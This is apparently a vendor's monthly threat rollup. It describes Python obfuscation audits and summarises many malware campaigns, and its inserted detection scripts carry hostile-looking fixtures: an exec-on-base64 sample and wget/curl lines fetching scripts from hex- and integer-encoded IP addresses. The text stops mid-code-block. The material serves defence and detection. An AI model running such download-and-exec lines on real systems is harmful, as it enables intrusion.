Stay safe from the latest cyber threats: October 2023 update

Are you prepared for the ever-evolving landscape of cyber threats? In this month's cyber threat rollup, we've observed some major new attacks, including the active exploitation of CVE-2023-22515 affecting Atlassian Confluence Data Center and Server. Additionally, Johnson Controls fell victim to a ransomware assault in which the attackers employed Dark Angels ransomware to seize control of the firm's VMware ESXi servers.

Both familiar and new threat actors made headlines. The Lazarus group targeted an aerospace company in Spain, while a newcomer, ClearFake, emerged in the "fake updates" threat landscape. As threat vectors evolve, we've noticed new attack strategies, like the exploitation of AI-assisted search engines to deceive users into downloading malware.

Keysight is an S&P 500 technology company headquartered in California and operating in over 100 countries worldwide. We have 20+ years of network and security excellence, and our global Application and Threat Intelligence (ATI) Research Center keeps current on the latest threats.

Threat Simulator, our industry-leading breach and attack simulation (BAS) solution, is designed to enhance your security posture. Our ATI team ensures Threat Simulator keeps you safe by simulating the latest threats, helping you quickly identify, remediate, and validate security vulnerabilities before they make headlines.

Stay one step ahead: check out the new Audits and Threat Campaigns we have added to Threat Simulator.

New Audits

Compile After Delivery - 'python3 exec/compile functions & base64': Run an obfuscated python script which decodes and runs base64-encoded instructions (Obfuscation inside python3 source file)

In order to avoid detection, adversaries may deliver files to target systems as uncompiled code. Attackers combine these source code files with the compilers/interpreters already present on the targeted system to produce the running form of the malware. Text source code files can evade certain protection mechanisms that mainly target executables. This audit uses a python3 script which disguises itself as a simple program calculating the inverse square root of a number given on the command line.

However, an obfuscated base64 payload is also present that, when decoded and executed, creates a new file. The path of the new file is provided from the command line.

Compile After Delivery - 'python3 bytecode': Run an obfuscated python script which changes the bytecode of certain instructions within the `__code__` property (Obfuscation inside python3 source file)

In order to avoid detection, adversaries may deliver files to target systems as uncompiled code. Attackers combine these source code files with the compilers/interpreters already present on the targeted system to produce the running form of the malware. Text source code files can evade certain protection mechanisms that mainly target executables.

This audit includes a python script which, when executed, writes into itself a decoded base64 python instruction that will be executed on the next run. This form of execution may bypass defense techniques because it does not use the `compile` or `exec` built-in functions.

Code reinterpretation is achieved by replacing the internal `__code__` object of the benign function `ctype_isqrt` with the `__code__` object of the decoded base64 instruction, which creates a new file.

The first execution of the script decodes and writes into itself the malicious instruction which changes the behavior of `ctype_isqrt()`. The second execution runs the injected instruction, creates the new file and then deletes the injected instruction. This behavior repeats every two executions. To obscure its true intent, the script also calculates the fast inverse square root (`ctypes_isqrt`) of a number provided as a command-line parameter.

Compile After Delivery - 'python3': Run python script which self-injects malicious instructions inside its abstract syntax tree representation (Obfuscation inside python3 source file)

In order to avoid detection, adversaries may deliver files to target systems as uncompiled code. Attackers combine these source code files with the compilers/interpreters already present on the targeted system to produce the running form of the malware. Text source code files can evade certain protection mechanisms that mainly target executables.

This audit includes a python script which is disguised as a simple program to calculate the inverse square root of a number given on the command line. However, the script also changes its own behavior, adding a hidden feature which creates a new file. The new behavior is injected by tampering with the script's Abstract Syntax Tree. The path of the new file is provided from the command line.
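The three audits above share three source-level tells a defender can look for before a script ever runs: a base64 blob handed to `exec`/`eval`/`compile`, an assignment to a function's `__code__` attribute, and `ast.parse` followed by `compile`/`exec`. The static triage script below, an added example that is not Keysight's audit code, walks a file's AST and reports those patterns. The function `find_indicators` and the four sample scripts are assumptions constructed for the demonstration; the samples stand in for the audit payloads and are only parsed, never executed.

```python
"""Static triage for the three Python obfuscation patterns the audits describe.
Added example (not Keysight's audit code); every sample script here is
constructed for the demonstration and is only parsed, never executed.

  1. exec()/eval()/compile() applied to base64-decoded data
  2. reassignment of a function's __code__ attribute
  3. ast.parse()/ast.fix_missing_locations() combined with compile()/exec()
"""
import ast
from typing import List

RUNTIME_EVAL = {"exec", "eval", "compile"}
DECODERS = ("b64decode", "decodebytes", "b85decode", "a85decode")
AST_REWRITE = {"ast.parse", "ast.fix_missing_locations", "ast.unparse"}


def _callee(node: ast.AST) -> str:
    """Dotted name of a call target (Name or Attribute chain), '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _callee(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def _calls_in(node: ast.AST) -> List[ast.Call]:
    """Every Call node at or below `node`."""
    return [n for n in ast.walk(node) if isinstance(n, ast.Call)]


def find_indicators(source: str) -> List[str]:
    """Return one human-readable finding per suspicious construct in `source`."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"unparseable source ({exc.msg}); inspect manually"]

    findings: List[str] = []
    all_calls = _calls_in(tree)
    names = {_callee(c.func) for c in all_calls}
    has_runtime_eval = bool(names & RUNTIME_EVAL)
    has_decoder = any(n.endswith(DECODERS) for n in names)

    # Pattern 1, strong form: decoded bytes are passed straight into exec/eval/compile.
    for call in all_calls:
        if _callee(call.func) in RUNTIME_EVAL and any(
            _callee(c.func).endswith(DECODERS) for arg in call.args for c in _calls_in(arg)
        ):
            findings.append(f"line {call.lineno}: {_callee(call.func)}() on base64-decoded data")
    # Pattern 1, weak form: decoding and evaluation co-occur but the data flows through variables.
    if has_decoder and has_runtime_eval and not findings:
        findings.append("module decodes base64 and calls exec/eval/compile; check data flow")

    # Pattern 2: `func.__code__ = ...` swaps the body of a benign-looking function.
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign):
            for target in node.targets:
                if isinstance(target, ast.Attribute) and target.attr == "__code__":
                    findings.append(f"line {node.lineno}: __code__ of {_callee(target.value)} reassigned")

    # Pattern 3: the script parses/edits an AST and then compiles or executes the result.
    if names & AST_REWRITE and has_runtime_eval:
        findings.append("module rewrites an ast tree and compiles/executes it")
    return findings


# Constructed samples (parsed only). SAMPLE_BASE64 decodes its payload at exec time,
# SAMPLE_CODE_SWAP replaces ctype_isqrt's body, SAMPLE_AST compiles an edited tree.
SAMPLE_BASE64 = '''\
import base64, sys
def isqrt(x): return x ** -0.5
exec(base64.b64decode(sys.argv[1]).decode())
'''
SAMPLE_CODE_SWAP = '''\
import sys
def ctype_isqrt(x): return x ** -0.5
def _hidden(): return "replaced body"
ctype_isqrt.__code__ = _hidden.__code__
'''
SAMPLE_AST = '''\
import ast
tree = ast.parse("x = 1")
tree.body.append(ast.parse("y = 2").body[0])
exec(compile(ast.fix_missing_locations(tree), "<rewritten>", "exec"))
'''
SAMPLE_CLEAN = '''\
import math, sys
print(1 / math.sqrt(float(sys.argv[1])))
'''

if __name__ == "__main__":
    for label, src in [("base64", SAMPLE_BASE64), ("code-swap", SAMPLE_CODE_SWAP),
                       ("ast", SAMPLE_AST), ("clean", SAMPLE_CLEAN)]:
        print(label, find_indicators(src) or ["no indicators"])
```

The strong form of pattern 1 only fires when the decoder call sits inside the argument of `exec`/`eval`/`compile`; payloads that pass the decoded bytes through a variable are caught by the weaker co-occurrence check, which is why the result is a triage hint rather than a verdict. Note that none of the three patterns involves the binary executable that file-based protections usually inspect, which is the point of the "compile after delivery" technique.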

New Threat Campaigns

BunnyLoader, the newest Malware-as-a-Service

Zscaler provides an in-depth analysis of a malware named 'BunnyLoader', developed in C++. The malware creates a new registry value for persistence, uses anti-VM techniques to evade detection, and performs an HTTP registration request to a C2 server. After registration, BunnyLoader performs various tasks such as keylogging, information stealing, and remote command execution. The malware targets web browsers, cryptocurrency wallets, VPN clients, and messaging applications to steal sensitive data. The stolen data is archived and exfiltrated to the C2 server. The malware also checks for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.

Lazarus luring employees with trojanized coding challenges: Spanish aerospace company

ESET researchers have uncovered a cyberespionage campaign by the Lazarus group against an aerospace company in Spain. The attack began with a successful spearphishing campaign on LinkedIn, where the threat actor posed as a recruiter for Meta. The victim was tricked into downloading and executing a malicious executable disguised as a coding challenge. The campaign introduced a new remote access trojan (RAT) named LightlessCan, which represents a significant advancement compared to its predecessor, BlindingCan. LightlessCan mimics the functionalities of a wide range of native Windows commands, enhancing the stealthiness of the attacker's activities.

Malicious ad served inside Bing's AI chatbot

Malwarebytes has published a report about how Bing Chat, an AI-assisted search engine, can be exploited by threat actors to trick users into downloading malware. Ads are inserted into Bing Chat conversations, and when a user hovers over a link, an ad is displayed first before the organic result. Upon clicking the ad link, users are taken to a malicious website which filters traffic and separates real victims from bots, sandboxes, or security researchers. Real humans are redirected to a fake site that imitates the official one, where they are induced to download a malicious installer. This incident was reported to Microsoft along with other related malicious ads.

Malicious Packages Hidden in NPM

Fortinet Threat Intelligence, FortiGuard, released a report on malicious packages hiding in open-source package repositories such as PyPI or NPM. These packages include scripts that run before or after installation and are meant to steal the user's sensitive data and send it to the threat actor.

ZenRAT: Malware Brings More Chaos Than Calm

The Proofpoint Threat Research Team reported a new malware called ZenRAT, which is being distributed via fake installation packages of the password manager Bitwarden. The malware targets Windows users and will redirect users on other hosts to a benign webpage. It is a modular remote access trojan (RAT) with information stealing capabilities. The malware was discovered on a website pretending to be associated with Bitwarden. The malware collects system information and sends it back to its command and control server along with stolen browser data/credentials.

WinRAR Vulnerability Puts Illicit Content Consumers at Risk of Apanyan Stealer, Murk-Stealer & AsyncRAT

Cyble published an article regarding the use of CVE-2023-38831, found in WinRAR, to obtain remote code execution and ultimately deploy Apanyan Stealer, Murk-Stealer, AsyncRAT and Kiwi Grabber. Attackers use adult websites to deliver a malicious archive which exploits CVE-2023-38831. A CMD file downloads a batch file which prepares the system for further malware and downloads the PowerShell-based Kiwi Grabber. Afterwards the Apanyan Stealer and Murk-Stealer, both developed in Python, steal banking, crypto wallet and Steam account credentials stored locally or in the browser. AsyncRAT, written in C#, is also used to further extend the attack's capabilities on the victim system.

Threat Actors Employ Remote Admin Tools to Gain Access over Corporate Networks

Cyble released a report regarding the TA505 threat actor targeting Russian users trying to download geographically restricted applications such as ExpressVPN, WeChat and Skype from unverified websites. Due to various restrictions, Russian users tried downloading trojanized applications embedded with malicious payloads. Once downloaded from the fake websites, a dropper designed as a self-extracting archive is deployed on the victim's computer. The archive contains Remote Management System binaries, a technology similar to Remote Desktop Protocol (RDP); when they are executed, the victim system connects to a C2 server and enables screen and file sharing.

Storm-0324 to Sangria Tempest Leads to Ransomware Capabilities

Trellix has published a report regarding the threat actor group known as 'Storm-0324', which has been observed using phishing tactics through Microsoft Teams to establish initial access to compromised systems. Once access is gained, they often hand it off to other well-known ransomware groups, including Sangria Tempest. The malware used by Storm-0324, JSSLoader, a .NET executable, is noted for its delivery mechanism and anti-analysis techniques. The campaign involves various stages of infection, including emails, malicious documents, and executable files. Other malicious documents are VB or JS script files. The final payload leads to a Ransomware as a Service (RaaS) attack by Sangria Tempest.

CL0P Seeds ^_- Gotta Catch Em All!

The article describes the activities of the CL0P ransomware group, which has recently started using torrents to distribute stolen data from a large number of companies. The group has exploited a zero-day vulnerability in the MOVEit software product by Progress, affecting over 3,000 U.S.-based organizations and 8,000 global organizations. To distribute the stolen data, CL0P has shifted from leak sites on the Onion network to torrents, which offer faster download speeds. The group's activities have been tracked to several hosting servers in Russia.

Analyzing Snake Keylogger in ANY.RUN: a Full Walkthrough

Any.Run researchers describe a cyber threat involving the Snake Keylogger malware, developed in .NET. The threat begins with a phishing email that encourages the recipient to download and open an attachment containing the malware. Once activated, the malware collects system information, establishes persistence, and steals credentials from the victim's browsers. The stolen data is then exfiltrated via SMTP.

IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits

Fortinet has published an article describing a Mirai-based DDoS campaign named IZ1H9 observed in September 2023, where remote attackers exploit vulnerabilities in Linux platforms to gain control of the systems. The attack pattern includes the usage of a variety of exploits targeting different devices like D-Link, Netis wireless router, Zyxel devices, TP-Link Archer, and TOTOLINK routers among others. The threat actor uses these exploits to inject payloads and gain command execution, enabling them to expand their botnet swiftly. The affected entities are any organization using the vulnerable systems. Notably, the attack leverages new vulnerabilities and has the capacity to infect devices on a large scale.

Active Lycantrox infrastructure illumination

Sekoia Threat & Detection Research Team has published an article describing a campaign where the threat actor, possibly related to the Lycantrox intrusion set, used Cytrox's Predator spyware to target individuals such as the former Egyptian MP Ahmed Eltantawy. The spyware was installed on iOS devices through a zero-day exploit chain. The infrastructure employed by Lycantrox consists of VPS hosted in several autonomous systems, each user managing their own instances of VPS and domain names related to it.

Threat Actor deploys Mythic’s Athena Agent to target Russian Semiconductor Suppliers

Cyble continued their research into campaigns exploiting CVE-2023-38831 and found how a Russian semiconductor supplier has been targeted by an unknown threat actor using a spear phishing email. The attack leverages a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deliver a second-stage payload known as Athena, an agent of the Mythic C2 framework. The objective is to gain full control over the compromised system.

Assessed Cyber Structure and Alignments of North Korea in 2023

The Democratic People's Republic of Korea (DPRK) has been evolving its offensive cyber program, using cyber intrusions for espionage and financial crimes. Multiple threat actor groups such as UNC614, APT37, APT38, APT43 and TEMP.Hermit have been presented together with their success in creating malware such as MAUI and HolyGh0st. Besides cyber espionage, these groups were involved in ransomware and information stealing operations.

#StopRansomware: MedusaLocker

CISA released an article discussing a cyber threat involving MedusaLocker ransomware, which exploits vulnerabilities in Remote Desktop Protocol (RDP) to access victims' networks. The attackers then encrypt the victim's data and demand ransom payments to a specific Bitcoin wallet address. MedusaLocker operates as a Ransomware-as-a-Service (RaaS) model, with ransom payments split between the affiliate and the developer. The ransomware propagates across the network via a PowerShell script and employs various techniques to evade detection and establish persistence. The size of the ransom demand varies based on the victim's perceived financial status.

Technical Advisory: Critical Vulnerabilities in WS_FTP Exploited in the Wild

Bitdefender describes a campaign where threat actors exploit the CVE-2023-40044 vulnerability in unpatched WS_FTP Server software. Besides CVE-2023-40044, other minor vulnerabilities, which affect all versions of the software, were discovered by Progress Software Corporation.

The threat actor leverages a flaw in a .NET object deserialization component which lets external users send, via HTTP, binary payloads disguised as class instances in order to execute arbitrary code on the victim machine. Afterwards, the attacker uses the command prompt to deploy the Metasploit framework, finally downloading other obfuscated malware payloads.

Analyzing Lu0Bot: A Node.js Malware with Near-Unlimited Capabilities

Any.Run researchers published an analysis of the Lu0Bot malware, built using NodeJS and able to capture keystrokes and execute remote commands issued by a C2 server. The attack originates from a malicious archive containing the NodeJS runtime environment split into multiple binary files, along with a batch file that initializes the malware bot controller. A C2 server will connect to infected machines and instruct them to execute encrypted and obfuscated JavaScript payloads.

LostTrust Ransomware | Latest Multi-Extortion Threat Shares Traits with SFile and Mindware

SentinelOne published a report related to the emergence of LostTrust ransomware, written in Rust, which is an evolution of the previous ransomware families SFile and Mindware. The ransomware ends processes and services related to Microsoft Exchange, MSSQL, SharePoint, Tomcat and PostgreSQL. In addition, it disables backup operations and deletes Windows Event Logs.

Operation Jacana: Foundling hobbits in Guyana

ESET researchers describe 'Operation Jacana', a cyberespionage campaign targeting a governmental entity in Guyana using DinodasRAT, a C++ backdoor, and the Korplug tool. The campaign was detected by ESET researchers and is believed to have been executed by a China-aligned Advanced Persistent Threat (APT) group. The threat actors used a mix of known and previously unknown tools, such as DinodasRAT and Korplug, to gain initial access through spearphishing emails and move laterally across the victim's network. DinodasRAT is capable of gathering screen captures and clipboard data and executing further commands coming from a C2 server.

Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant

The cybercriminal group Void Rabisu has been launching a series of attacks with motivations ranging from financial gain to espionage. The group is known for targeting the Ukrainian government, military, utility sectors, EU politicians, and more. Their weapon of choice is the ROMCOM backdoor, of which they seem to be the exclusive user. In 2023, they exploited the zero-day vulnerability CVE-2023-36884 in attacks against governments. They also set up a malicious copy of the official website for the Women Political Leaders Summit in Brussels, using it as a lure to target attendees. Void Rabisu also began using a new TLS-enforcing technique on the ROMCOM command-and-control servers.

Dark Angels | ESXi Ransomware Borrows Code & Victimology From RagnarLocker

In September 2023, Johnson Controls, a company specializing in manufacturing and automation, fell victim to a ransomware assault. The culprits, whose identities remain unknown, employed Dark Angels ransomware to seize control of the firm's VMware ESXi servers. This particular strain of ransomware bears a striking resemblance to the ESXi version of RagnarLocker, active between 2020 and 2022.

Initial reports of Dark Angels surfaced in 2022, highlighting its compatibility with Linux systems based on Intel. It employs AES encryption with a 256-bit key to cipher files, and it can circumvent file locks by identifying and terminating the responsible process using its PID. Notably, it shares several characteristics with the RagnarLocker ransomware, such as the encryption method, file extension, and criteria for excluding certain file paths from encryption.

Threat Source Newsletter (October 12, 2023) — Top resources for Cybersecurity Awareness Month

Talos released its new weekly Threat Source Newsletter (October 12, 2023) including the most prevalent malware observed over the past week. It was reported that the recent vulnerability discovered in the HTTP/2 protocol, identified as CVE-2023-44487, was exploited to launch the largest DDoS attack in history, prompting urgent advisories and patch releases from major tech companies. The top headlines of the week include a massive DDoS attack exploiting a new HTTP/2 vulnerability, a significant data breach at genetic testing service 23AndMe, and the International Committee of the Red Cross's appeal to hacktivist groups to adhere to wartime guidelines.

Understanding DNS Tunneling Traffic in the Wild

The article discusses a study on why and how domain name system (DNS) tunneling techniques are used in the wild, particularly in malware campaigns like SUNBURST and OilRig. The researchers built a system to automatically attribute tunneling domains to tools and campaigns, which can gather information about the DNS tunneling traffic and provide details about the tools and the associated campaigns in real time. Apart from threat actors using DNS tunneling techniques for command and control (C2) communication, the system also found enterprise employees and vehicle passengers using them for censorship circumvention and to bypass network service charges.

ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses

Ahnlab has published an article describing a shift in the distribution method of ShellBot malware, which is being installed on poorly managed Linux SSH servers. The threat actor has changed the download URL from a regular IP address to a hexadecimal value, likely to evade detection. ShellBot, also known as PerlBot, is a DDoS Bot malware that uses the IRC protocol to communicate with a C&C server. The threat actor scans for systems with port 22 open, searches for active SSH services, and uses a list of commonly used SSH account credentials to initiate dictionary attacks. If successful, they can install a variety of malware.
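The hexadecimal download address described above works because the system resolver (inet_aton) accepts an IPv4 address written as hex, octal, a single 32-bit integer or fewer than four components, while string-based URL or IP matching does not. The script below, an added example that is not AhnLab's code, canonicalises such hosts back to dotted-quad form so log lines and blocklists can be compared on the real address; the helper names (`canonical_ipv4`, `classify_url`, `flag_obfuscated_hosts`) and the sample session log are assumptions constructed for the demonstration.

```python
"""Canonicalise IPv4 hosts written in the non-dotted-decimal notations that
inet_aton accepts (hex, octal, a single integer, fewer than four parts), so a
URL such as http://0x7f000001/ is matched as 127.0.0.1. Added example, not
AhnLab's code; the sample log lines below are constructed."""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

_PART = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def _part_value(part: str) -> int:
    """One host component under inet_aton rules: 0x.. hex, leading 0 octal, else decimal."""
    if not _PART.match(part):
        raise ValueError(f"not a numeric component: {part!r}")
    low = part.lower()
    if low.startswith("0x"):
        return int(low[2:], 16)
    if len(low) > 1 and low.startswith("0"):
        return int(low, 8)
    return int(low, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of `host` if it is an IPv4 address in any inet_aton
    notation; None for hostnames, IPv6 literals and out-of-range components."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_part_value(p) for p in parts]
    except ValueError:
        return None
    # The final component fills all remaining bytes: a.b.c.d / a.b.c / a.b / a
    widths = [8] * (len(values) - 1) + [8 * (5 - len(values))]
    addr = 0
    for value, width in zip(values, widths):
        if value >= 1 << width:
            return None
        addr = (addr << width) | value
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def classify_url(url: str) -> Tuple[Optional[str], bool]:
    """(canonical host or None, True when the address was written in a non-standard notation)."""
    host = urlsplit(url).hostname or ""
    canon = canonical_ipv4(host)
    return canon, canon is not None and canon != host


def flag_obfuscated_hosts(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan free text (shell history, an SSH session log) for URLs whose host is
    a non-canonical IPv4 literal; returns (host as written, dotted quad) pairs."""
    hits = []
    for line in lines:
        for url in _URL.findall(line):
            host = urlsplit(url).hostname or ""
            canon, obfuscated = classify_url(url)
            if obfuscated:
                hits.append((host, canon))
    return hits


# Constructed sample: three commands as they might appear in a captured session log.
SAMPLE_LOG = [
    "wget -q http://0x7f000001/a.pl -O /tmp/a.pl",
    "curl -s http://3232235521/update.sh",
    "curl -s http://192.168.0.1/update.sh",
]

if __name__ == "__main__":
    for host, canon in flag_obfuscated_hosts(SAMPLE_LOG):
        print(f"{host} -> {canon}")
```

Run against the sample log, only the first two commands are flagged, since the third already uses the canonical form. Feeding the canonical host into an existing IP blocklist, rather than the literal string from the URL, removes the advantage the notation change was meant to buy.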

X-Force uncovers global NetScaler Gateway credential harvesting campaign

SecurityIntelligence X-Force published an article regarding an unidentified threat actor exploiting the vulnerability CVE-2023-3519 in unpatched NetScaler Gateways to obtain remote code execution. Attackers exploited CVE-2023-3519 to inject a PHP webshell and retrieve internal data of the NetScaler Gateway VPN instance. Using the leaked information, a JavaScript file is injected into the HTML file responsible for the login page. The script intercepts credentials and sends them to the C2 server.

Kimsuky Threat Group Uses RDP to Control Infected Systems

Ahnlab has published an article about the North Korea-supported threat group Kimsuky, known for attacks on the national defense, diplomatic and academic sectors, the defense and media industries, and national organizations. Using spear phishing attacks, the group gains access to internal information and technology from targets. After initial access, they typically install backdoors or infostealers to control infected systems and extract sensitive data. They also utilize legitimate tools and malware like xRAT for the same purpose. Notably, they often use Remote Desktop Protocol (RDP) for remote control during their attacks. They also use a range of other tools, such as TinyNuke and TightVNC.

Active exploitation of Cisco IOS XE Software Web Management User Interface vulnerability

Talos alerts users of a campaign where an unknown attacker exploits a previously unknown vulnerability in the Web UI feature of Cisco IOS XE software (CVE-2023-20198). The attacker creates an account on the affected device with full administrator privileges, allowing them to take full control of the compromised device. Afterwards, the attacker can deliver a Lua-based implant inside the affected device in order to enhance their attacking capabilities.

Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have issued a joint advisory regarding the active exploitation of CVE-2023-22515 affecting Atlassian Confluence Data Center and Server. Threat actors have exploited this vulnerability to gain initial access to Confluence instances by creating unauthorized administrator accounts. This malicious administrator account creation was achieved by tricking the targeted system into reading setup configuration regarding account management from an unsecured endpoint inside the application. Finally, attackers exfiltrated data using tools such as cURL or RClone.

The forgotten malvertising campaign

Malwarebytes has published a report about custom malware payloads using Google ads, evading detection for several months. They have targeted popular software such as Notepad++ and PDF converters, delivering payloads through unique, time-sensitive downloads that perform system fingerprint checks for VM detection such that if the check fails, the user is redirected to the legitimate Notepad++ website. The campaign uses a .hta script and connects to a remote domain. The threat actor is likely using this to gain access to victims' machines with tools such as Cobalt Strike.

Malicious Notepad++ Google ads evade detection for months

BleepingComputer warned that a new malvertising campaign has been detected that targets users intending to download the Notepad++ text editor. The campaign employs advanced evasion and redirection techniques to distribute malware, likely Cobalt Strike, through fake software download websites promoted via Google Ads. Once the victims click on the ads, they are redirected to a decoy site that checks their system fingerprint and serves a malicious HTA script to legitimate targets. The campaign has been active for several months and has evaded detection.

BbyStealer Malware Resurfaces, Sets Sights on VPN Users

Cyble described a phishing campaign that uses fake VPN applications to disseminate an information-stealing malware known as BbyStealer. The threat actors employ phishing websites to trick users into downloading malicious VPN applications. These applications contain the BbyStealer malware, which is designed to steal sensitive data from web browsers and cryptocurrency wallet extensions and send it to a remote server. The malware also performs a 'clipper operation' that replaces copied cryptocurrency wallet addresses with the threat actor's wallet address. The campaign targets users globally and does not exploit any specific vulnerabilities.

An iLUMMAnation on LummaStealer - VMware Security Blog

VMware researchers have observed the evolution and changes of LummaStealer since its appearance as a Malware-as-a-Service (MaaS). Various attackers who purchased the LummaStealer program deceive victims through fake Chrome browser updates. Once such an update is executed, a loader called IDAT is deployed which prepares the final LummaStealer payload.

Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability

Microsoft has published a report about the North Korean nation-state threat actors Diamond Sleet and Onyx Sleet, which have been observed exploiting the CVE-2023-42793 vulnerability in JetBrains TeamCity server since October 2023. The actors are exploiting the same vulnerability but using unique sets of tools and techniques. Microsoft assesses that this activity poses a high risk to organizations, especially as these actors have previously successfully carried out software supply chain attacks. The affected entities are primarily in the defense and IT services sector, and the regions targeted include South Korea, the United States, and India. JetBrains has released an update to address this vulnerability.

Crambus: New Campaign Targets Middle Eastern Government

Symantec released a report regarding the Crambus espionage group, which stole files, captured keystrokes and intercepted emails. The group deployed PowerShell backdoors and infostealers alongside popular tools such as Mimikatz and Plink, and used a Microsoft Exchange instance as a C2 server. Further PowerShell commands for the victim to execute were sent through email.

Organizations under attack from cryptominer-keylogger-backdoor combo

Securelist described how threat actors download scripts onto victims' devices to deliver a crypto miner, a keylogger and a backdoor. The malicious executables were deployed by exploiting known vulnerabilities on servers and workstations. In addition, the attackers used tools to tamper with Windows Defender.

Updated MATA attacks industrial companies in Eastern Europe

Kaspersky released a detailed report regarding the use of the complex MATA malware, generations 4 and 5, against defense infrastructure in Eastern Europe. Threat actors deployed a rootkit and a modular backdoor, together with plugins capable of keylogging, taking screenshots and stealing saved credentials. In addition, attackers leveraged a CVE-2021-26411 exploit to disable security products and an intricate malware that spreads itself through USB sticks.

Ransomware actor exploits unsupported ColdFusion servers - but comes away empty-handed

Sophos has released an article about a threat actor targeting servers with a variety of payloads, with the most common being Cobalt Strike Beacons, ransomware, fileless PowerShell backdoors, miners, and webshells. The actor tries to gain access to Windows servers via vulnerabilities in Adobe's ColdFusion Server and deploy ransomware. Although unsuccessful, the attempts were associated with a single actor or group of actors, who attempted to deploy ransomware created using leaked source code from the LockBit 3.0 ransomware family.

Clever malvertising attack uses Punycode to look like KeePass's official website

Malwarebytes has published a report on threat actors impersonating the popular open-source password manager KeePass through a sophisticated malvertising campaign. They use a copycat internationalized domain name that employs Punycode to mimic the legitimate KeePass site. The malicious ad appears when users search for 'keepass' on Google and leads victims to a fake KeePass site that offers a malicious download. This download contains PowerShell code that communicates with the malware's command and control server, advertising the new victim and setting the stage for future reconnaissance by human threat actors.

Quasar RAT Leverages DLL Side-Loading Techniques

Uptycs discovered that QuasarRAT malware is being deployed on vulnerable systems using the DLL sideloading method. Two genuine Windows executables are downloaded together with a malicious DLL which will be loaded once one of the previously mentioned executables starts. Afterwards, the process hollowing technique is also employed to deliver the final payload, QuasarRAT. QuasarRAT is able to capture keystrokes and screenshots and steal credentials stored locally.

Another InfoStealer Enters the Field, ExelaStealer

Fortinet Threat Intelligence, FortiGuard, released an article discussing a new entry in the InfoStealer market, ExelaStealer, which appeared in 2023. This malware can steal sensitive information from a Windows-based host, such as passwords, credit cards, cookies, session data, and general keylogging. The malware is written in Python and can be compiled and packaged on a Windows-based host. The initial infection vector could be achieved through various ways like phishing, watering holes, other malware, etc.

Qubitstrike - An Emerging Malware Campaign Targeting Jupyter Notebooks - Cado Security

Cado described a malware campaign called Qubitstrike, which targets exposed Jupyter Notebook servers in the cloud. The malware uses Discord's bot functionality for command and control and seeks credentials for popular cloud services like AWS and Google Cloud. It uses Codeberg, an alternative Git hosting platform, to host its payloads. The malware also includes the ability to propagate itself to related hosts via SSH and uses the Diamorphine LKM rootkit to hide its malicious processes. The main objective of the campaign is resource hijacking for cryptocurrency mining, but the malware could potentially carry out other attacks as well.

ClearFake: a newcomer to the "fake updates" threats landscape

Sekoia presented ClearFake, a new malicious JavaScript framework that was first seen in July 2023. ClearFake is deployed on compromised WordPress websites to deliver further malware using the drive-by download technique. It injects JavaScript payloads that redirect users to a fake browser update webpage. If such an update is installed, the HijackLoader program is installed on the victim system to deploy other malicious payloads.

Stealer for PIX payment system, new Lumar stealer and Rhysida ransomware

Securelist has published a report regarding different kinds of malware that have been active in the last year, including information stealers and ransomware. GoPIX has been an active malware campaign since December 2022. It tricks users searching for "WhatsApp web" through malvertising, employs a fraud prevention solution, and uses a multi-stage attack to infiltrate systems, primarily affecting users in Brazil that utilize the PIX payment system.

Lumar offers a range of capabilities such as capturing Telegram sessions, harvesting passwords and cookies, retrieving files, and extracting data from cryptographic wallets, all while being managed through a user-friendly C2 panel and primarily targeting non-CIS countries. Rhysida, a recently emerged ransomware variant, exhibits typical characteristics of modern ransomware, including Ransomware as a Service (RaaS) distribution and hidden TOR services. It can self-destruct through PowerShell and has support for older Windows versions while being written in C++ and compiled using MinGW.

TA558 group attacking legacy systems in LATAM

MetabaseQ provided a detailed analysis of the TA558 eCrime adversary, which primarily targets the hospitality, finance and manufacturing sectors in Latin America. The adversary distributes malicious campaigns via spam emails, commonly in Portuguese, Spanish, and English. The payloads are Excel documents that try to exploit the CVE-2017-8570, CVE-2017-11882 and CVE-2018-0798 vulnerabilities to download malicious Visual Basic payloads. Finally, through reflective .NET payloads, Remcos, AgentTesla or LimeRAT are installed.

Battling a new DarkGate malware campaign with Malwarebytes MDR

Malwarebytes described a campaign in which DarkLoader was spread via external Microsoft Teams messages. The attackers sent a malicious ZIP file which contained disguised malicious shortcut files. When clicked, these shortcuts triggered the execution of an AutoIt script which deployed DarkLoader.

Discord, I Want to Play a Game

Trellix described a threat campaign that uses Discord webhooks for data exfiltration and the Discord Content Delivery Network (CDN) for malware distribution. The campaign is very recent and is still under development; no data has been exfiltrated yet.
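The two Discord abuses described above (webhook POSTs for exfiltration, CDN attachments for payload delivery) are both visible in outbound proxy logs. The following detection script is an added example, not code from the original post or from Trellix; the log format, the webhook ID/token and the client addresses are constructed for the demo.

```python
"""Flag Discord webhook exfiltration and Discord CDN payload downloads in proxy logs.

Added example, not code from the original post or the Trellix report. Log lines use
an assumed simplified format: "<epoch> <client_ip> <method> <url> <bytes_out>".
"""
import re
from urllib.parse import urlparse

# Constructed sample: one webhook POST, one CDN executable download, two benign requests.
SAMPLE_LOG = """\
1698000001 10.0.0.5 POST https://discord.com/api/webhooks/1234567890/AbCdEfGhIj 48213
1698000002 10.0.0.5 GET https://cdn.discordapp.com/attachments/111/222/update.exe 0
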